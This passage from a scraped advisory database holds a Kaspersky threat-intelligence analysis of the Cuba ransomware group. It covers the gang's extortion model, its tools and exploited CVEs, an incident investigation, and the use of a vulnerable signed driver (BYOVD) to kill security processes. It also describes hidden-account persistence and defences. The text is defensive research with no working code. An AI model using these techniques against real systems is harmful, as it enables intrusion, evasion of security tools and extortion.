group's website is hosted in the Cuba domain:\n\n_http[:]//test[.]cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd[.]onion/_\n\n[![Website of V IS VENDETTA](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02-1024x561.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02.png>)\n\nWebsite of V IS VENDETTA\n\nCuba remains active as at the time of writing this, and we keep hearing about new extortion victims.\n\n## Victimology\n\n_In this section, we used data consensually provided by our users and information about victims from open sources, such as other security vendors' reports and the data leak site of the ransomware gang itself._\n\nThe group has attacked numerous companies around the world. Industry affiliation does not seem to be a factor: victims have included retailers, financial and logistical services, government agencies, manufacturers, and others. In terms of geography, most of the attacked companies have been located in the United States, but there have been victims in Canada, Europe, Asia and Australia.\n\n[![Geographic distribution of Cuba victims](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03-1024x550.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03.png>)\n\nGeographic distribution of Cuba victims\n\n## Ransomware\n\nThe Cuba ransomware is a single file without additional libraries. Samples often have a forged compilation timestamp: those found in 2020 were stamped with June 4, 2020, and more recent ones, June 19th, 1992.\n\n## Cuba extortion model\n\n[![Extortion models](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04-945x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04.png>)\n\nExtortion models\n\nFour extortion models exist today in terms of tools used for pressuring the victim.\n\n * Single extortion: encrypting data and demanding a ransom just for decryption.\n * Double extortion: besides encrypting, attackers steal sensitive information. They threaten to both withhold the encryption key and publish the stolen information online unless the victim pays up. This is the most popular model among ransomware gangs today.\n * Triple extortion: adding a threat to expose the victim's internal infrastructure to DDoS attacks. The model became widespread after the LockBit gang got [DDoS'ed](<https://techcrunch.com/2022/08/22/entrust-lockbit-ddos-ransomware/>), possibly by a victim. After getting targeted, the hackers realized that DDoS was an effective pressure tool, something they [stated openly](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/>), setting an example for others. To be fair, [isolated cases of triple extortion](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-add-ddos-attacks-to-their-extortion-arsenal/>) predate the LockBit case.\n * The fourth model is the least common one, as it implies maximum pressure and is thus more costly. It adds spreading news of the breach among the victim's investors, shareholders and customers. DDoS attacks in that case are not necessary. This model is exemplified by the recent [hack of Bluefield University in Virginia](<https://www.bleepingcomputer.com/news/security/ransomware-gang-hijacks-university-alert-system-to-issue-threats/>), where the AvosLocker ransomware gang hijacked the school's emergency broadcast system to send students and staff SMS texts and email alerts that their personal data had been stolen. The hackers urged not to trust the school's management, who they said were concealing the true scale of the breach, and to make the situation public knowledge as soon as possible.\n\nThe Cuba group is using the classic double extortion model, encrypting data with the Xsalsa20 symmetric algorithm, and the encryption key, with the RSA-2048 asymmetric algorithm. This is known as hybrid encryption, a cryptographically secure method that prevents decryption without the key.\n\nCuba ransomware samples avoid encrypting files with the following name extensions: .exe, .dll, .sys, .ini, .lnk, .vbm and .cuba, and the following folders:\n\n * \\windows\\\n * \\program files\\microsoft office\\\n * \\program files (x86)\\microsoft office\\\n * \\program files\\avs\\\n * \\program files (x86)\\avs\\\n * \\$recycle.bin\\\n * \\boot\\\n * \\recovery\\\n * \\system volume information\\\n * \\msocache\\\n * \\users\\all users\\\n * \\users\\default user\\\n * \\users\\default\\\n * \\temp\\\n * \\inetcache\\\n * \\google\\\n\nThe ransomware saves time by searching for, and encrypting, Microsoft Office documents, images, archives and others in the %AppData%\\Microsoft\\Windows\\Recent\\ directory, rather than all files on the device. It also terminates all SQL services to encrypt any available databases. It looks for data both locally and inside network shares.\n\n[![List of services that the Cuba ransomware terminates](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png>)\n\nList of services that the Cuba ransomware terminates\n\nBesides encrypting, the group steals sensitive data that it discovers inside the victim's organization. The type of data that the hackers are after depends on the industry that the target company is active in, but in most cases, they exfiltrate the following:\n\n * Financial documents\n * Bank statements\n * Company accounts details\n * Source code, if the company is a software developer\n\n## Arsenal\n\nThe group employs both well-known, "classic" credential access tools, such as mimikatz, and self-written applications. It exploits vulnerabilities in software used by the victim companies: mostly known issues, such as the combination of [ProxyShell](<https://www.computerweekly.com/news/252505767/Half-of-MS-Exchange-servers-at-risk-in-ProxyShell-debacle>) and [ProxyLogon](<https://www.computerweekly.com/news/252497200/Emergency-patch-addresses-MS-Exchange-Server-zero-days>) for attacking Exchange servers, and security holes in the Veeam data backup and recovery service.\n\n[![Malware](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png>)\n\n**Malware**\n\n * Bughatch\n * Burntcigar\n * Cobeacon\n * Hancitor (Chanitor)\n * Termite\n * SystemBC\n * Veeamp\n * Wedgecut\n * RomCOM RAT\n\n[![Tools](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png>)\n\n**Tools**\n\n * Mimikatz\n * PowerShell\n * PsExec\n * Remote Desktop Protocol\n\n[![Vulnerabilities](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png>)\n\n**Vulnerabilities**\n\nProxyShell:\n\n * CVE-2021-31207\n * CVE-2021-34473\n * CVE-2021-34523\n\nProxyLogon:\n\n * CVE-2021-26855\n * CVE-2021-26857\n * CVE-2021-26858\n * CVE-2021-27065\n\nVeeam vulnerabilities:\n\n * [CVE-2022-26501](<https://vulners.com/cve/CVE-2022-26501>)\n * [CVE-2022-26504](<https://vulners.com/cve/CVE-2022-26504>)\n * [CVE-2022-26500](<https://vulners.com/cve/CVE-2022-26500>)\n\n[ZeroLogon](<https://en.wikipedia.org/wiki/Zerologon>):\n\n * CVE-2020-1472\n\n[![Mapping of the attack arsenal to MITRE ATT&CK\u00ae tactics](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09.png>)\n\nMapping of the attack arsenal to MITRE ATT&CK\u00ae tactics\n\n## Profits\n\nThe incoming and outgoing payments in the bitcoin wallets whose identifiers the hackers provide in their ransom notes exceed a total of 3,600 BTC, or more than $103,000,000 converted at the rate of $28,624 for 1 BTC. The gang owns numerous wallets, constantly transferring funds between these, and uses bitcoin mixers: services that send bitcoins through a series of anonymous transactions to make the origin of the funds harder to trace.\n\n[![Part of the transaction tree in the BTC network](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10-1024x517.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10.png>)\n\nPart of the transaction tree in the BTC network\n\n## Investigation of a Cuba-related incident and analysis of the malware\n\n### Host: SRV_STORAGE\n\nOn December 19, we spotted suspicious activity on a customer host, which we will refer to as "SRV_STORAGE" in this report. Telemetry data showed three suspicious new files:\n\n[![Suspicious events in the telemetry data as discovered by the Kaspersky SOC](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11-1024x377.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11.png>)\n\nSuspicious events in the telemetry data as discovered by the Kaspersky SOC\n\nAn analysis of kk65.bat suggested that it served as a stager that initiated all further activity by starting rundll32 and loading the komar65 library into it, which runs the callback function DLLGetClassObjectGuid.\n\n[![Contents of the .bat file that we found](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png>)\n\nContents of the .bat file that we found\n\nLet us take a look inside the suspicious DLL.\n\n#### Bughatch\n\nThe komar65.dll library is also known as "Bughatch", a name it was given in a [report](<https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware>) by Mandiant.\n\nThe first thing that caught our attention was the path to the PDB file. There's a folder named "mosquito" in it, which translates into Russian as "komar". The latter is a part of the DDL name suggesting the gang may include Russian speakers.\n\n[![Path to the komar65.dll PDB file](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13-1024x526.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13.png>)\n\nPath to the komar65.dll PDB file\n\nThe DLL code presents Mozilla/4.0 as the user agent when connecting to the following two addresses:\n\n * com, apparently used for checking external connectivity\n * The gang's command-and-control center. The malware will try calling home if the initial ping goes through.\n\n[![Analysis of komar65.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14-1024x605.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14.png>)\n\nAnalysis of komar65.dll\n\nThis is the kind of activity we observed on the infected host. After Bughatch successfully established a connection with the C2 server, it began collecting data on network resources.\n\n[![Bughatch activity](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15-1024x494.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15.png>)\n\nBughatch activity\n\nLooking into the C2 servers, we found that in addition to Bughatch, these spread modules that extend the malware's functionality. One of those collects information from the infected system and sends it back to the server in the form of an HTTP POST request.\n\n[![Files we found on the Cuba C2 servers](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16-1024x526.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16.jpeg>)\n\nFiles we found on the Cuba C2 servers\n\nOne could think of Bughatch as a backdoor of sorts, deployed inside the process memory and executing a shellcode block within the space it was allocated with the help of Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject), to then connect to the C2 and await further instructions. In particular, the C2 may send a command to download further malware, such as Cobalt Strike Beacon, Metasploit, or further Bughatch modules.\n\n[![Bughatch operating diagram](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17.png>)\n\nBughatch operating diagram\n\n### SRV_Service host\n\n#### Veeamp\n\nAfter some time, we found a malicious process started on a neighboring host; we dubbed this "SRV_Service":\n\n[![Malicious process starting ](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18-1024x260.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18.png>)\n\nMalicious process starting\n\n**Veeamp.exe **is a custom-built data dumper written in C#, which leverages security flaws in the Veeam backup and recovery service to connect to the VeeamBackup SQL database and grab account credentials.\n\n[![Analysis of Veeamp](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19-1024x619.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19.png>)\n\nAnalysis of Veeamp\n\n**Veeamp **exploits the following Veeam vulnerabilities: CVE-2022-26500, CVE-2022-26501, CVE-2022-26504. The first two allow an unauthenticated user to remotely execute arbitrary code, and the third one, lets domain users do the same. After any of the three are exploited, the malware outputs the following in the control panel:\n\n * User name\n * Encrypted password\n * Decrypted password\n * User description in the Credentials table of Veeam: group membership, permissions and so on\n\nThe malware is not exclusive to the Cuba gang. We spotted it also in attacks by other groups, such as Conti and [Yanluowang](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>).\n\nActivity we saw on SRV_Service after Veeamp finished its job was similar to what we had observed on SRV_STORAGE with Bughatch:\n\n[![Bughatch activity on SRV_Service](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20-1024x333.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20.png>)\n\nBughatch activity on SRV_Service\n\nAs was the case with SRV_STORAGE, the malware dropped three files into the temp folder, and then executed these in the same order, connecting to the same addresses.\n\n#### Avast Anti-Rootkit driver\n\nAfter Bughatch successfully established a connection to its C2, we watched as the group used an increasingly popular technique: Bring Your Own Vulnerable Driver (BYOVD).\n\n[![Exploiting a vulnerable driver](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21-1024x424.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21.png>)\n\nExploiting a vulnerable driver\n\nThe malicious actors install the vulnerable driver in the system and subsequently use it to various ends, such as terminating processes or evading defenses through privilege escalation to kernel level.\n\nHackers are drawn to vulnerable drivers because they all run in kernel mode, with a high level of system access. Besides, a legitimate driver with a digital signature will not raise any red flags with security systems, helping the attackers to stay undetected for longer.\n\nDuring the attack, the malware created three files in the temp folder:\n\n * **aswarpot.sys**: a legitimate anti-rootkit driver by Avast that has two vulnerabilities: [CVE-2022-26522](<https://vulners.com/cve/CVE-2022-26522>) and [CVE-2022-26523](<https://vulners.com/cve/CVE-2022-26523>), which allow a user with limited permissions to run code at kernel level.\n * **KK.exe**: malware known as Burntcigar. The file we found was a new variety that used the flawed driver to terminate processes.\n * **av.bat** batch script: a stager that helps the kernel service to run the Avast driver and executes Burntcigar.\n\nAnalysis of the BAT file and telemetry data suggests that av.bat uses the sc.exe utility to create a service named "aswSP_ArPot2", specifying the path to the driver in the \u0421\\windows\\temp\\ directory and the service type as kernel service. The BAT file then starts the service with the help of the same sc.exe utility and runs KK.exe, which connects to the vulnerable driver.\n\n[![Contents of the .bat file that we found](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22-1024x98.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22.png>)\n\nContents of the .bat file that we found\n\n#### Burntcigar\n\nThe first thing we noticed while looking into Burntcigar was the path to the PDB file, which contained a folder curiously named "Musor" (the Russian for "trash"), more indication that the members of the Cuba gang may speak Russian.\n\n[![Path to the KK.exe PDB file](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23-1024x359.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23.png>)\n\nPath to the KK.exe PDB file\n\nWe further discovered that the sample at hand was a new version of Burntcigar, undetectable by security systems at the time of the incident. The hackers had apparently updated the malware, as in the wake of previous attacks, many vendors were able to easily detect the logic run by older versions.\n\nYou may have noticed that in the screenshot of our sample below, all data about processes to be terminated is encrypted, whereas older versions openly displayed the names of all processes that the attackers wanted stopped.\n\n[![Comparison between the old and new version of Burntcigar](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24-1024x779.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24.png>)\n\nComparison between the old and new version of Burntcigar\n\nThe malware searches for process names that suggest a relation to popular AV or EDR products and adds their process IDs to the stack to terminate later.\n\nBurntcigar uses the DeviceIoContol function to access the vulnerable Avast driver, specifying the location of the code that contains the security issue as an execution option. The piece of code contains the ZwTerminateProcess function, which the attackers use for terminating processes.\n\n[![Analysis of Burntcigar](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25-1024x280.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25.png>)\n\nAnalysis of Burntcigar\n\nFortunately, our product's self-defense was able to cope with the malware by blocking all hooks to the driver.\n\nLater, we discovered similar activity exploiting the Avast anti-rootkit driver on the Exchange server and the SRV_STORAGE host. In both cases, the attackers used a BAT file to install the insecure driver and then start Burntcigar.\n\n[![Burntcigar activity on the neighboring hosts](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26-1024x126.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26.png>)\n\nBurntcigar activity on the neighboring hosts\n\n### SRV_MAIL host (Exchange server)\n\nOn December 20, the customer granted our request to add the Exchange server to the scope of monitoring. The host must have been used as an entry point to the customer network, as the server was missing critical updates, and it was susceptible to most of the group's initial access vectors. In particular, SRV_MAIL had the ProxyLogon, ProxyShell and Zerologon vulnerabilities still unremediated. This is why we believe that the attackers penetrated the customer network through the Exchange server.\n\n[![Telemetry data starts coming in](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27-1024x187.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27.png>)\n\nTelemetry data starts coming in\n\nOn SRV_MAIL, the SqlDbAdmin user showed the same kind of activity as that which we had observed on the previous hosts.\n\n[![Malicious activity by SqlDbAdmin](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28-1024x404.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28.png>)\n\nMalicious activity by SqlDbAdmin\n\nWe found that the attackers were using the legitimate gotoassistui.exe tool for transferring malicious files between the infected hosts.\n\nGoToAssist is an RDP support utility often used by technical support teams, but the application is often abused to bypass any security defenses or response teams when moving files between systems.\n\n[![Sending malicious files via gotoassistui.exe](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29-1024x414.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29.png>)\n\nSending malicious files via gotoassistui.exe\n\nWe also found that new Bughatch samples were being executed. These used slightly different file names, callback functions and C2 servers, as our systems were successfully blocking older versions of the malware at that time.\n\n[![Bughatch activity](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30-1024x545.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30.png>)\n\nBughatch activity\n\n#### SqlDbAdmin\n\nWe wondered who that SqlDbAdmin was. The answer came through a suspicious DLL, addp.dll, which we found manually on a compromised host.\n\n[![Suspicious dynamic library](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31-1024x62.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31.png>)\n\nSuspicious dynamic library\n\nWe found that it used the WIN API function NetUserAdd to create the user. The name and password were hard-coded inside the DLL.\n\n[![Analysis of addp.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32-1024x403.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32.png>)\n\nAnalysis of addp.dll\n\nAs we looked further into the library, we found that it used the **RegCreateKey** function to enable RDP sessions for the newly created user by modifying a registry setting. The library then added the user to the Special Account registry tree to hide it from the system login screen, an interesting and fairly unconventional persistence technique. In most cases, bad actors add new users with the help of scripts thatsecurity products rarely miss.\n\n[![Analysis of addp.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33-1024x457.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33.png>)\n\nAnalysis of addp.dll\n\n#### Cobalt Strike\n\nWe found a suspicious DLL, ion.dll, running on the Exchange server as part of the rundll32 process with unusual execution options. At first, we figured that the activity was similar to what we had earlier seen with Bughatch. However, further analysis showed that the library was, in fact, a Cobalt Strike Beacon.\n\n[![Execution of the suspicious ion.dll file](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34-1024x308.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34.png>)\n\nExecution of the suspicious ion.dll file\n\nWhen we were looking at the ion.dll code, what caught our attention was execution settings and a function that uses the Cobalt Strike configuration. The library used the VirtualAlloc function for allocating process memory to execute the Cobalt Strike Beacon payload in, later.\n\n[![Analysis of ion.dll](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png>)\n\nAnalysis of ion.dll\n\nAll configuration data was encrypted, but we did find the function used for decrypting that. To find the Cobalt Strike C2 server, we inspected a rundll32 memory dump with ion.dll loaded into it, running with the same settings it did on the victim host.\n\n[![Memory dump of rundll32](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png>)\n\nMemory dump of rundll32\n\nFinding out the name of the C2 helped us to locate the history of communications with that server within the telemetry data. After the malware connected to the C2, it downloaded two suspicious files into the Windows folder on the infected server and then executed these. Unfortunately, we were not able to obtain the two files for analysis, as the hackers had failed to disable security at the previous step, and the files were wiped off the infected host. We do believe, though, that what we were dealing with was the ransomware itself.\n\n[![Communications with the attackers' C2 server ](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37-1024x471.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37.png>)\n\nCommunications with the attackers' C2 server\n\nThe customer promptly isolated the affected hosts and forwarded the incident to the Kaspersky Incident Response team for further investigation and search for possible artifacts. This was the last we saw of the malicious actor's activity in the customer system. The hosts avoided encryption thanks to the customer following our recommendations and directions, and responding to the incident in time.\n\n## New malware\n\nWe found that VirusTotal contained new samples of the Cuba malware with the same file metadata as the ones in the incident described above. Some of those samples had successfully evaded detection by all cybersecurity vendors. We ran our analysis on each of the samples. As you can see from the screenshot below, these are new versions of Burntcigar using encrypted data for anti-malware evasion. We have made Yara rules that detect these new samples, and we are providing these in the attachment to this article.\n\n[![New malware samples](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38-1024x447.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38.png>)\n\nNew malware samples\n\n## BYOVD (Bring Your Own Vulnerable Driver)\n\nWe will now take a closer look at an attack that uses insecure drivers, which we observed as we investigated the incident and which is currently growing in popularity as various APT and ransomware gangs add it to their arsenals.\n\nBring Your Own Vulnerable Driver (BYOVD) is a type of attack where the bad actor uses legitimate signed drivers that are known to contain a security hole to execute malicious actions inside the system. If successful, the attacker will be able to exploit the vulnerabilities in the driver code to run any malicious actions at kernel level!\n\nUnderstanding why this is one of the most dangerous kinds of attacks takes a quick refresher on what drivers are. A driver is a type of software that acts as an intermediary between the operating system and the device. The driver converts OS instructions into commands that the device can interpret and execute. A further use of drivers is supporting applications or features that the operating system originally lacks. As you can see from the image below, the driver is a layer of sorts between user mode and kernel mode.\n\n[![User mode and kernel mode interaction diagram](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png>)\n\nUser mode and kernel mode interaction diagram. Source: \n<https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode>\n\nApplications running in user mode have fewer privileges to control the system. All they can get access to is a virtualized memory area that is isolated and protected from the rest of the system. The driver runs inside the kernel memory, and it can execute any operations just like the kernel itself. The driver can get access to critical security structures and modify those. Modifications like that make the system liable to attacks that use privilege escalation, disabling of OS security services, and arbitrary reading and writing.\n\nThe [Lazarus](<https://www.bleepingcomputer.com/news/security/lazarus-hackers-abuse-dell-driver-bug-using-new-fudmodule-rootkit/>) gang made use of that technique in 2021 as they gained write access to kernel memory and disabled Windows security features by abusing a Dell driver that contained the [CVE-2021-21551](<https://vulners.com/cve/CVE-2021-21551>) vulnerability.\n\nThere is no sure-fire defense from legitimate drivers, because any driver could prove to have a security flaw. Microsoft has published a list of recommendations to protect against this type of techniques:\n\n * Enable Hypervisor-Protected Code Integrity.\n * Enable Memory Integrity.\n * Enable validation of driver digital signatures.\n * Use the [vulnerable driver blocklist](<https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules>).\n\nHowever, [studies](<https://habr.com/ru/companies/kaspersky/articles/693840/>) suggest that the recommendations are irrelevant even with every Windows protection feature enabled, and attacks like these go through anyway.\n\nTo counter this technique, many security vendors started adding a self-defense module into their products that prevents malware from terminating processes and blocks every attempt at exploiting vulnerable drivers. Our [products](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-select>) have that feature too, and it proved effective during the incident.\n\n## Conclusion\n\nThe Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools, which it keeps up to date, and various techniques and methods including fairly dangerous ones, such as BYOVD. Combating attacks at this level of complexity calls for sophisticated technology capable of detecting advanced threats and protecting security features from being disabled, and a massive, continuously updated threat knowledge base that helps to detect malicious artifacts manually.\n\nThe incident detailed in this article shows that investigation of real-life cyberattacks and incident response, such as Managed Detection and Response (MDR), are sources of the latest information about malicious tactics, techniques and procedures. In particular, during this investigation, we discovered new and previously undetected samples of the Cuba malware, and artifacts suggesting that at least some of the gang members spoke Russian.\n\nThat said, effective investigation and response begin with knowledge of current cyberthreats, which is available from Threat Intelligence services. At Kaspersky, the Threat Intelligence and MDR teams work closely while exchanging data and enhancing their services all the time.\n\n## Appendix\n\nSigma and YARA rules: <https://github.com/BlureL/SigmaYara-Rules> \nIndicators of Compromise: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/14105934/Cuba-ransomware-IoCs-02.pdf>) \nMitre ATT&CK matrices: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/11095522/Cuba-ransomware-TTPs.pdf>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-11T10:00:26", "type": "securelist", "title": "From Caribbean shores to your devices: analyzing Cuba ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-21551", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-26500", "CVE-2022-26501", "CVE-2022-26504", "CVE-2022-26522", "CVE-2022-26523"], "modified": "2023-09-11T10:00:26", "id": "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "href": "https://securelist.com/cuba-ransomware/110533/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T12:37:38", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/26093821/abstract_digits_cell-990x400.jpg)\n\n * [IT threat evolution Q3 2021](<https://securelist.com/it-threat-evolution-q3-2021/104876/>)\n * **IT threat evolution in Q3 2021. PC statistics**\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2021:\n\n * Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.\n * Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.\n * Ransomware attacks were defeated on the computers of 108,323 unique users.\n * Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2021, Kaspersky solutions blocked the 